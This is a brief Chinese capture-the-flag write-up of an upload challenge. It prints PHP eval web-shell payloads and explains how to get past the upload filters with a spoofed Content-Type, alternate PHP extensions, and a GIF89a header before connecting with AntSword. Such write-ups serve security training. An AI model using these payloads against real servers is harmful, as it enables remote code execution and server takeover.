[极客大挑战 2019]Upload

知识点

1.Content-Type绕过

2.文件头绕过

3.后缀名绕过

 

题目

拿到题目是一道上传题

 

先来简单地上传一个一句话木马

<?php @eval($_POST['a']);?>

保存为a.php

抓包

 

 

提示Not image!

那我们来更改一下Content-Type: image/jpeg

又提示Not php

 

 

它既要是一张图片的格式又要是php的文件

我们来改改后缀试试

php,php3,php4,php5,phtml,pht

 

 

这里被html实体化，应该是这个样子

 

 

考虑绕过

<script language="php">eval($_POST['a']);</script>

又提示

 

 

应该是校验了文件的内容

在文件内容的前面加上GIF89a的标识

 

 

用蚁剑连一下，在根目录下查找（一般上传后的文件都在upload下）